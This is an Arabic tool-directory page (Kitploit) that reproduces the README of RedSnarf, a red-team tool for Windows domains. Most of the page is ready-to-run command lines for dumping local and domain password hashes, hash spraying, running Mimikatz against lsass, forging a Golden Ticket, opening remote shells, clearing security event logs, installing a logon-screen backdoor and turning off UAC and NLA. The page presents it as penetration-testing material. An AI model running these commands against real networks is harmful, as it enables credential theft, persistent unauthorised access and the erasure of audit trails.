Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
redsnarf — RedSnarf هي أداة اختبار اختراق / فريق أحمر لبيئات ويندوز | Kitploit
أدوات/GitHubGitHub/nccgroup/redsnarf
كسر كلمات المرورتصعيد الامتيازاتتوليد الحمولةالاستغلالتحليل التجزئةالحركة الجانبيةجمع المعلوماتما بعد الاستغلالاختبار الاختراقالقيادة والسيطرةالفريق الأحمرأداة الوصول عن بعد
1.2k235منذ 8 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHubnccgroup/redsnarf

redsnarf

RedSnarf هي أداة اختبار اختراق / فريق أحمر لبيئات ويندوز

عرض المستودعالموقع الإلكتروني
root@kitploit:~
    ______           .____________                     _____  
\______   \ ____   __| _/   _____/ ____ _____ ________/ ____\ 
 |       _// __ \ / __ |\_____  \ /    \\__  \\_  __ \   __\  
 |    |   \  ___// /_/ |/        \   |  \/ __ \|  | \/|  |    
 |____|_  /\___  >____ /_______  /___|  (____  /__|   |__|    
        \/     \/     \/       \/     \/     \/         
                                  [email protected]
                                                  @redsnarf

GitHub license

ريدسنارف هي أداة اختبار اختراق / فريق أحمر من إعداد إد ويليامز لاسترجاع التجزئات وبيانات الاعتماد من محطات العمل والخوادم ووحدات تحكم المجال في ويندوز باستخدام تقنيات آمنة من منظور عمليات الأمان (OpSec).

شاهد قناتنا على يوتيوب لمشاهدة فيديوهات https://www.youtube.com/channel/UCDGWRxpHo6d8y6qIeMAXnxQ

وظائف ريدسنارف تشمل:

• استرجاع تجزئات SAM المحلية • تعداد المستخدمين الذين يعملون بصلاحيات نظام مرتفعة وبيانات اعتماد lsa secrets الخاصة بهم؛ • استرجاع بيانات اعتماد MS المخبأة؛ • تمرير التجزئة (Pass-the-hash)؛ • التحديد السريع لمجموعات اسم المستخدم/كلمة المرور الضعيفة والقابلة للتخمين (الافتراضي هو administrator/Password01)؛ • القدرة على استرجاع التجزئات عبر نطاق؛ • رش التجزئات (Hash spraying) - credsfile يقبل مزيجاً من pwdump و fgdump ونص عادي لاسم المستخدم وكلمة المرور مفصولة بمسافة؛ • تفريغ lsass للتحليل دون اتصال باستخدام Mimikatz؛ • تفريغ تجزئات وحدة تحكم المجال باستخدام NTDSUtil واسترجاع NTDS.dit للمعالجة المحلية؛ • تفريغ تجزئات وحدة تحكم المجال باستخدام طريقة drsuapi؛ • استرجاع مجلد Scripts and Policies من وحدة تحكم المجال وتحليله بحثاً عن 'password' و 'administrator'؛ • القدرة على فك تشفير تجزئات cpassword؛ • القدرة على تشغيل شل على جهاز بعيد؛ • القدرة على مسح سجلات الأحداث (التطبيق، الأمان، الإعداد، أو النظام)؛ (الإصدار الداخلي فقط) • يتم حفظ النتائج على أساس كل مضيف للتحليل. • تمكين/تعطيل RDP على جهاز بعيد. • تغيير منفذ RDP من 3389 إلى 443 على جهاز بعيد. • تمكين/تعطيل NLA على جهاز بعيد. • إيجاد أماكن تسجيل دخول المستخدمين على الأجهزة البعيدة. • باب خلفي لشاشة تسجيل الدخول في ويندوز • تمكين/تعطيل UAC على جهاز بعيد. • إضافة mimikatz متخفي. • تحليل تجزئات المجال • القدرة على تحديد الحسابات المفعلة/المعطلة • التقاط لقطة شاشة لسطح المكتب لمستخدم نشط مسجل الدخول عن بُعد • تسجيل سطح المكتب لمستخدم نشط مسجل الدخول عن بُعد • فك تشفير كلمة مرور ويندوز المشفرة (CPassword) • فك تشفير كلمة مرور WinSCP • الحصول على SPNs للمستخدمين • استرجاع كلمات مرور الواي فاي من الأجهزة البعيدة

استخدام ريدسنارف

المتطلبات: Impacket v0.9.16-dev - https://github.com/CoreSecurity/impacket.git CredDump7 - https://github.com/Neohapsis/creddump7 استرجاع Lsass باستخدام procdump - https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx Netaddr (0.7.12) - pip install netaddr Termcolor (1.1.0) - pip install termcolor iconv - يُستخدم مع تحليل معلومات Mimikatz محلياً

عرض المساعدة ./redsnarf.py -h ./redsnarf.py --help

استرجاع التجزئات المحلية

استرجاع التجزئات المحلية من جهاز واحد باستخدام بيانات اعتماد محلية ضعيفة ومسح سجل أحداث الأمان ./redsnarf.py -H ip=10.0.0.50 -uC security

استرجاع التجزئات المحلية من جهاز واحد باستخدام بيانات اعتماد محلية ضعيفة ومسح سجل أحداث التطبيق ./redsnarf.py -H ip=10.0.0.50 -uC application

استرجاع التجزئات المحلية من جهاز واحد باستخدام بيانات اعتماد المسؤول المحلي ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d .

استرجاع التجزئات المحلية من جهاز واحد باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com

استرجاع التجزئات عبر نطاق شبكة باستخدام بيانات اعتماد المسؤول المحلي ./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d .

استرجاع التجزئات عبر نطاق شبكة باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com

استرجاع التجزئات عبر نطاق شبكة باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H file=targets.txt -u administrator -p Password01 -d yourdomain.com

رش التجزئات

رش التجزئات عبر نطاق شبكة ./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d .

استرجاع التجزئات عبر نطاق شبكة مع تسجيل دخول المجال ./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d yourdomain.com

التحقق السريع من بيانات الاعتماد ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password1 -d . -cQ y

التحقق السريع من ملف يحتوي على أسماء المستخدمين (-hS) وكلمة مرور عامة (-hP) ./redsnarf.py -H ip=10.0.0.1 -hS /path/to/usernames.txt -hP PasswordToTry -cQ y

استرجاع تجزئات المجال

استرجاع التجزئات باستخدام طريقة drsuapi (الأسرع) هذه الطريقة تدعم علامة اختيارية -q y والتي ستستعلم عن LDAP وتخرج ما إذا كانت الحسابات نشطة أم معطلة ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hI y (-hQ y)

استرجاع التجزئات باستخدام NTDSUtil هذه الطريقة تدعم علامة اختيارية -q y والتي ستستعلم عن LDAP وتخرج ما إذا كانت الحسابات نشطة أم معطلة ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hN y (-hQ y)

إنشاء التذكرة الذهبية (Golden Ticket) ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hT y

جمع المعلومات

نسخ مجلد Policies and Scripts من وحدة تحكم المجال وتحليله بحثاً عن password و administrator ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -uP y

فك تشفير Cpassword ./redsnarf.py -uG cpassword

البحث عن مستخدم - مباشر /redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eL user.name

البحث عن مستخدم - دون اتصال (يبحث في المعلومات التي تم تحميلها مسبقاً) /redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eO user.name

عرض قائمة مهام NT AUTHORITY\SYSTEM /redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eT y

التقاط لقطة شاشة لسطح المكتب لمستخدم نشط مسجل الدخول عن بُعد /redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eS y

متنوع

تشغيل شل على جهاز باستخدام بيانات اعتماد المسؤول المحلي ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -uD y

تشغيل شل على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uD y

استرجاع نسخة من lsass للتحليل دون اتصال باستخدام Mimikatz على جهاز باستخدام بيانات اعتماد المسؤول المحلي ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -hL y

تشغيل mimikatz متخفي، هذا الخيار يشغل خادم ويب لتقديم سكريبت powershell، وهو مشفر ومشوش جهة الجهاز، البيانات لا تلمس القرص - يتم البحث عن بيانات الاعتماد بأسلوب سهل القراءة وعرضها على الشاشة. ./redsnarf.py -H ip=192.168.198.162 -u administrator -p Password01 -cS y -hR y

تشغيل أمر مخصص مثال 1 ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'net user'

مثال 2 - يجب إفلات علامات الاقتباس المزدوجة باستخدام
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'dsquery group -name "domain admins" | dsget group -members -expand'

سياسة رمز الوصول المحلي (Local Access Token Policy) ينشئ ملف باتش lat.bat يمكنك نسخه ولصقه على الجهاز البعيد لتنفيذه، والذي سيعدل السجل ويمكن أو يعطل إعدادات سياسة رمز الوصول المحلي. ./redsnarf.py -rL y

Wdigest تمكين قيمة سجل UseLogonCredential الخاصة بـ Wdigest على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW e

تعطيل قيمة سجل UseLogonCredential الخاصة بـ Wdigest على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW d

الاستعلام عن قيمة سجل UseLogonCredential الخاصة بـ Wdigest على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW q

UAC تمكين قيمة سجل UAC على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU e

تعطيل قيمة سجل UAC على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU d

الاستعلام عن قيمة سجل UAC على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU q

باب خلفي - باب خلفي لشاشة ويندوز - اضغط Left Shift + Left Alt + Print Screen للتفعيل تمكين قيمة سجل الباب الخلفي على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB e

تعطيل قيمة سجل الباب الخلفي على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB d

الاستعلام عن قيمة سجل الباب الخلفي على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB q

تسجيل الدخول التلقائي (AutoLogon) تمكين قيمة سجل تسجيل الدخول التلقائي في ويندوز على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA e

تعطيل قيمة سجل تسجيل الدخول التلقائي في ويندوز على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA d

الاستعلام عن قيمة سجل تسجيل الدخول التلقائي في ويندوز على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA q

قفل جلسة مستخدم على جهاز بعيد باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uL y

RDP

تمكين RDP على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR e

تعطيل RDP على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR d

الاستعلام عن حالة RDP على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR q

تغيير منفذ RDP من 3389 إلى 443 - تغيير منفذ RDP إلى 443 على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT e

تغيير منفذ RDP إلى الإعداد الافتراضي 3389 على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT d

الاستعلام عن قيمة منفذ RDP على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT q

تمكين Multi-RDP باستخدام Mimikatz ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uR y

تمكين RDP SingleSessionPerUser على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM e

تعطيل RDP SingleSessionPerUser على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM d

الاستعلام عن حالة RDP SingleSessionPerUser على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM q

NLA

تمكين NLA على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN e

تعطيل NLA على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN d

الاستعلام عن حالة NLA على جهاز باستخدام بيانات اعتماد مسؤول المجال ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN q

root@kitploit:~
تنزيل الأداة